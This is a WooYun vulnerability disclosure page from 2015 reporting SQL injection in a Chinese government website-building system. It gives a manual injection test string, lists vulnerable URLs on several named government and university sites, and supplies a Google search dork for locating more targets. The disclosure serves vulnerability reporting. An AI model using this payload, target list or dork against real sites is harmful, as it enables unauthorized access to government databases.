当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0101463

漏洞标题:某政府建站系统SQL注入

相关厂商:泰得利通软件科技有限公司

漏洞作者: 雅柏菲卡

提交时间:2015-03-17 10:40

修复时间:2015-05-01 10:42

公开时间:2015-05-01 10:42

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:8

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-17: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-05-01: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

..................

详细说明:

............

漏洞证明:

以下均使用 经典的手工注入语句 【 ' and (select @@version)>0 -- -'】 进行测试
一、贵州省安监局
http://apzx.gzaj.gov.cn/WebPortal/SelfForm/list?SelfObjectID=b5b36657-d3da-4809-81bf-fa1ea8938312
http://test.gzaj.gov.cn/WebPortal/SelfForm/list.html?SelfObjectID=1090f63f-2407-44a0-b3b5-4629a67ae9b6
http://fwzx.gzaj.gov.cn/WebPortal/SelfForm/list.html?SelfObjectID=a1f4a332-6cec-4f7b-bb06-642cc740d042

QQ截图20150315105647.jpg


三分站 一样的效果 这里只截图一个
二、云南中医学院
http://www.tsg.ynutcm.edu.cn/WebPortal/SelfForm/list.html?SelfObjectID=8734a514-d9c5-41b7-85ff-16b93f749c03

QQ截图20150315110049.jpg


三、毕节市人民政府网站
http://www.bijie.gov.cn/WebPortal/SelfForm/list.html?SelfObjectID=6be2e2b7-bf6c-4f2a-bf2e-dd7e30ac18b8

QQ截图20150315110319.jpg


四、开阳县人民政府
http://www.kygov.gov.cn/WebPortal/SelfForm/list.html?SelfObjectID=0dace9f7-beea-427e-9ff9-7b53caa71dfb

QQ截图20150315110509.jpg


五、遵义市红花岗区人民政府
http://www.zyhhg.gov.cn/WebPortal/SelfForm/list.html?SelfObjectID=d4b64f36-1f2f-4665-9626-3127033cff7f

QQ截图20150315110739.jpg


五个列出来了 具体的 请谷歌inurl:SelfForm/list.html?SelfObjectID=

修复方案:

版权声明:转载请注明来源 雅柏菲卡@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

评论